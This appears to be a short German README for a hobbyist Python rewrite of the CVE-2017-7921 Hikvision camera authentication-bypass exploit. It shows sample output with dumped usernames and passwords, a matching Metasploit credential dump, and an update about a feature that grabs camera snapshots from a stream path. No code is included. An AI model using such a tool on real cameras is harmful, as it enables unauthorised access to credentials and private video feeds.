
Einfaches Rewrite von CVE-2017-7921 in Python von mir. Nur für Bildungszwecke!
Einfache CVE-2017-7921-Neufassung in python von mir. Nur für Bildungszwecke!
Ziemlich simpel, ich habe keine Checks für Sachen wie IPs und keine erweiterten Checks für die Antwort und so weiter eingebaut. Ich habe es an einer Kamera getestet, an der ich testen darf (in meinem lokalen Netzwerk), und es scheint einwandfrei zu funktionieren.
#Beispielausgabe:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
Dies entspricht den Zugangsdaten, die wir erhalten, wenn wir denselben Exploit mit "msfconsole" verwenden.
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#Quellen Tatsächliche Details: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#Update
Außerdem habe ich eine Snapshot-Funktion hinzugefügt, mit der du einen Schnappschuss von /Streaming/channels/1/picture abrufen und in einer Datei ip.jpg speichern kannst.